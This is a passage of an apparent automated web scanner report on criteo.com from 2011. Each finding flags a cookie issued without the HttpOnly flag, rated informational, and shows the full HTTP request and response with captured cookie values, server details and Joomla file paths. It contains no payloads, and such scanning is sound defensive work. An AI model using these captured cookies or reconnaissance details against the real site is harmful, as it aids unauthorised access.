Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:38 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 04 May 2010 01:37:22 GMT
Accept-Ranges: bytes
Content-Length: 579
Content-Type: image/gif

GIF89a.....@.F.F...A.A...q.q.,.9s9.8#..........pa5k5....UC....... .........O.O...LL..x`.`...V.VX.XX.X...4p4C.C.../`/H.H.......n_.WFu.uE.E....L9<.<.H4....K=...E.E.F2...A.A^.^..........\K={=...1e1....
...[SNIP]...

11.52. http://www.criteo.com/components/com_joomfish/images/flags/ko.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/components/com_joomfish/images/flags/ko.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /components/com_joomfish/images/flags/ko.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:38 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Fri, 25 Mar 2011 20:59:22 GMT
Accept-Ranges: bytes
Content-Length: 1043
Content-Type: image/gif

GIF89a.............7E.<Y.4h...{G..|.b=.fM.bM..........LF.LE.LF.RL.TN.WQ.XQ.]W.............KI....RS.xy.......GJ.QS....LS....................(.....M+..i..........%..%..'..&..'..%..$..'..4..~h..........
...[SNIP]...

11.53. http://www.criteo.com/components/com_joomfish/images/flags/nl.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/components/com_joomfish/images/flags/nl.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /components/com_joomfish/images/flags/nl.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:38 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 04 May 2010 01:37:27 GMT
Accept-Ranges: bytes
Content-Length: 570
Content-Type: image/gif

GIF89a.....@.....VJ..`.9+....+...d..../!...........y.(..#k....+........+..]R.pe.......OC...........+@..1#.2...._n........................ .0!..........D7EW..#......w.7).0!.UI.............1...
.....q.
...[SNIP]...

11.54. http://www.criteo.com/components/com_joomfish/images/flags/us.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/components/com_joomfish/images/flags/us.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /components/com_joomfish/images/flags/us.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:35 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Fri, 25 Mar 2011 21:55:18 GMT
Accept-Ranges: bytes
Content-Length: 2083
Content-Type: image/gif

GIF89a.........................^y....>^....p.....>_;^.....u....;^....9]....Jk....;]...!...."#8].......-^.....]w...............9]....Ut..UX4Y..jo.''.............L....)P..............h.......:^.9^..!".
...[SNIP]...

11.55. http://www.criteo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.3.10.1305478412; 240plan=R1146701318

Response

HTTP/1.1 404 Not Found
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:58 GMT
Server: Apache/2.2.X (OVH)
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 209

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

11.56. http://www.criteo.com/images/banners/en-us/footerlogos_nai.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/images/banners/en-us/footerlogos_nai.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/banners/en-us/footerlogos_nai.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:54 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 04 May 2010 01:41:15 GMT
Accept-Ranges: bytes
Content-Length: 1516
Content-Type: image/gif

GIF89aT....?..
csvv..[.........nh....-//VXX...6)s#.g...EGG............jll@5|......[S.......vq.add..................G<.......d].SK..}.............LB.{~~......orr......ehh]__..._V.......NQQ...H>}....
...[SNIP]...

11.57. http://www.criteo.com/images/banners/en-us/footerlogos_truste.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/images/banners/en-us/footerlogos_truste.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/banners/en-us/footerlogos_truste.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:54 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 04 May 2010 01:41:15 GMT
Accept-Ranges: bytes
Content-Length: 1394
Content-Type: image/gif

GIF89aq......cab..=...3/0....w............h.4..LOf-.....Y..............d..5;E&...........?($$...;89JGH..d...!.......,....q......`T,di.(:5_..p,.tm.o..|.g@.p7.....2......e..:...r....B E..T8f....f.....
...[SNIP]...

11.58. http://www.criteo.com/images/banners/en-us/iab-memberseal-white.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/images/banners/en-us/iab-memberseal-white.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/banners/en-us/iab-memberseal-white.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:54 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Wed, 02 Jun 2010 20:53:46 GMT
Accept-Ranges: bytes
Content-Length: 4151
Content-Type: image/gif

GIF89a..........;. @@@...w......".???....+!......,...%....Y........(....J.....___...h.....OOO.........ooo///........$...............................................................................
...[SNIP]...

11.59. http://www.criteo.com/images/banners/en-us/irce2011_logo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/images/banners/en-us/irce2011_logo.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/banners/en-us/irce2011_logo.jpg HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:52 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 03 May 2011 02:03:54 GMT
Accept-Ranges: bytes
Content-Length: 11862
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

..........................................................................................................}....
...[SNIP]...

11.60. http://www.criteo.com/images/home/step1.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/images/home/step1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/home/step1.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:43 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 04 May 2010 01:43:40 GMT
Accept-Ranges: bytes
Content-Length: 58061
Content-Type: image/gif

GIF89a.......U..b......fb.........wwxL.......dcdVVV.Z..f.......CBC...7........y.....556.j..c.#s.......ix.....-[..q!!!...n.....
..Z!(.............tp.....-......j.......z3AW.......ov....R...S/{..#N....
...[SNIP]...

11.61. http://www.criteo.com/images/home/step2.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/images/home/step2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/home/step2.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:44 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 04 May 2010 01:43:40 GMT
Accept-Ranges: bytes
Content-Length: 30204
Content-Type: image/gif

GIF89a..............ok......K44......300...`J+....*-s.................p33....p...{.........GEBVy.c..WDD...eee.........WWW....dZ.........wwweGG.H!.........hTT.HFVdk.{s...':B......zCA.sk.........8AE..{.
...[SNIP]...

11.62. http://www.criteo.com/images/home/step3.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/images/home/step3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/home/step3.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:45 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 04 May 2010 01:43:41 GMT
Accept-Ranges: bytes
Content-Length: 41288
Content-Type: image/gif

GIF89a...................................mc.....S...[[[888|||)..bbbiiiSSS...S..........."z.....z.KKK...............AAA...(((.....`.b......2."/
.....u...SxU (..j.j.y........q.5;@....1^....h.t|.Zcijqv.
...[SNIP]...

11.63. http://www.criteo.com/images/home/step4.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/images/home/step4.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/home/step4.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:49 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 04 May 2010 01:43:41 GMT
Accept-Ranges: bytes
Content-Length: 24094
Content-Type: image/gif

GIF89a..........KNO....Z...v............D..X...LL...b..t......\.....cZ......112....K.....TO.ug9...........fb....x......j..b..............$1...ffg&v.at.....uiwxz....Ob.........n...-\...............]...
...[SNIP]...

11.64. http://www.criteo.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
0ecea38193df0c9bab184bf1b140820e=fc36890f7569e961d051a8f498e5034a; path=/
lang=deleted; expires=Saturday, 15-May-10 16:56:12 GMT; path=/
jfcookie=deleted; expires=Saturday, 15-May-10 16:56:12 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.65. http://www.criteo.com/media/system/js/caption.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/media/system/js/caption.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/system/js/caption.js HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.3.10.1305478412; 240plan=R1146701318; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:30 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 04 May 2010 01:54:04 GMT
Accept-Ranges: bytes
Content-Length: 2150
Content-Type: application/javascript

/**
* @version        $Id: caption.js 5263 2006-10-02 01:25:24Z webImagery $
* @copyright    Copyright (C) 2005 - 2009 Open Source Matters. All rights reserved.
* @license        GNU/GPL, see LICENSE.php
* Joomla! i
...[SNIP]...

11.66. http://www.criteo.com/media/system/js/mootools.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/media/system/js/mootools.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/system/js/mootools.js HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.3.10.1305478412; 240plan=R1146701318; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:30 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 04 May 2010 01:54:08 GMT
Accept-Ranges: bytes
Content-Length: 74434
Content-Type: application/javascript

//MooTools, My Object Oriented Javascript Tools. Copyright (c) 2006 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:'1.12'};function $defined(obj){return(obj!=undefi
...[SNIP]...

11.67. http://www.criteo.com/modules/mod_jflanguageselection/tmpl/mod_jflanguageselection.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/modules/mod_jflanguageselection/tmpl/mod_jflanguageselection.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /modules/mod_jflanguageselection/tmpl/mod_jflanguageselection.css HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.3.10.1305478412; 240plan=R1146701318; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:30 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 04 May 2010 01:54:40 GMT
Accept-Ranges: bytes
Content-Length: 3230
Content-Type: text/css

/**
* Joom!Fish - Multi Lingual extention and translation manager for Joomla!
* Copyright (C) 2003-2009 Think Network GmbH, Munich
*
* All rights reserved. The Joom!Fish project is a set of exten
...[SNIP]...

11.68. http://www.criteo.com/templates/criteo/css/home.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/css/home.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/css/home.css HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.3.10.1305478412; 240plan=R1146701318; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:32 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Fri, 18 Feb 2011 01:25:31 GMT
Accept-Ranges: bytes
Content-Length: 4197
Content-Type: text/css

body
{
   background: #e1e8e8 url(../images/home/body.gif) repeat-x;
}

#home-box-main
{
   position: relative;
   margin-bottom: 30px;
   height: 310px;
   background: url(../images/home/home-blue.jp
...[SNIP]...

11.69. http://www.criteo.com/templates/criteo/css/main.css previous next

Summary

Severity:	Information
Confidence:	Certain
